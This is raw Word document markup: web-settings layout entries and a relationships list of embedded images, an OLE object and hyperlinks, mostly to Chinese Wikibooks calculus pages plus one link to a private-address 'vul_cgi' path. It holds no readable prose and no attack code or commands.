        <w:div w:id="143199999">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1365015991">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1991901769">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1044915145">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2073691598">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="878934950">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="834957478">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="991638057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1002666077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1867669257">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="891115405">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="18" w:space="8" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2020040038">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1552958488">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="18" w:space="8" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1541897995">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="150099576">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="18" w:space="8" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2095543471">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="460349176">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="18" w:space="8" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1034236485">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1245726522">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1366980979">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1925600887">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2112584355">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21436871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png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E9%82%BB%E5%9F%9F&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.jpeg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/wiki/File:Derivative.jpg" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.jpeg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.wmf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpeg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/wiki/File:Function_sgnx.jpg" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E6%9E%81%E5%9D%90%E6%A0%87&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikipedia.org/wiki/%E9%97%AD%E5%8C%BA%E9%97%B4" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.jpeg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><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hyperlink" Target="http://10.20.230.63/cgi-bin/vul_cgi" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpeg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/wiki/%E6%96%B9%E7%A8%8B" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/wiki/%E6%A5%B5%E9%99%90" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.jpeg"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpe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hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%BC%80%E5%8C%BA%E9%97%B4&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%87%BD%E6%95%B0&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E7%BB%9D%E5%AF%B9%E5%80%BC&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.wmf"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.jpeg"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikipedia.org/wiki/%E5%AE%9E%E5%87%BD%E6%95%B0" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikipedia.org/wiki/%E9%97%AD%E5%8C%BA%E9%97%B4" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.jpeg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%AE%9A%E4%B9%89%E5%9F%9F&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E6%B1%82%E5%AF%BC&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId185"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44.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.jpeg"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%BC%80%E5%8C%BA%E9%97%B4&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%AE%9E%E6%95%B0&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%8F%82%E6%95%B0%E6%96%B9%E7%A8%8B&amp;action=edit&amp;redlink=1" 